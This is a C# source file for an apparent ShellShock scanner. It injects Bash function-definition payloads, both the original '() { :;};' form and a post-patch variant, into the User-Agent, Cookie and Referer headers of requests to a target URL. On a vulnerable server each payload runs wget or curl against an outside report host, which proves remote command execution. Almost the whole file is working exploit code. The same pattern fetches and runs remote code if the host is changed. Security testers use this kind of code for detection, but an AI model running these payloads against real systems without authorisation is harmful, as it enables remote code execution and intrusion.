ShellShock.brandonpotter.com

1. using System;
2. using System.Collections.Generic;
3. using System.Linq;
4. using System.Net;
5. using System.Text;
6. using System.Threading.Tasks;
7.  
8. namespace ShellShockExploiter
9. {
10.     public class SSExploiter
11.     {
12.         public event Action<string> TestExecuted;
13.  
14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
15.         {
16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
17.  
18.             foreach (var header in headers)
19.             {
20.                 // original exploit
21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
25.  
26.                 // new exploit for patch
27.                 // () { (a)=>\' bash -c "echo date"
28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
32.             }
33.         }
34.  
35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
36.         {            
37.             ShortWebClient wC = new ShortWebClient();
38.             string serverResponse = "";
39.             try
40.             {
41.                 wC.Headers.Add(header, bashCmd);
42.                 wC.DownloadString(targetUrl);
43.                 serverResponse = "200 OK";
44.             }
45.             catch (TimeoutException te)
46.             {
47.                 serverResponse = "Timeout";
48.             }
49.             catch (WebException e)
50.             {
51.                 if (e.Message.Contains("(403) Forbidden"))
52.                 {
53.                     serverResponse = "403 Forbidden";
54.                 }
55.                 else if (e.Message.Contains("(404) Not Found"))
56.                 {
57.                     serverResponse = "404 Not Found";
58.                 }
59.                 else
60.                 {
61.                     serverResponse = "Error";
62.                 }
63.             }
64.             catch (Exception e) {
65.                 serverResponse = "No Response or Error";
66.             }
67.  
68.             wC.Dispose();
69.             wC = null;
70.  
71.             try
72.             {
73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
74.             }
75.             catch { }
76.         }
77.     }
78. }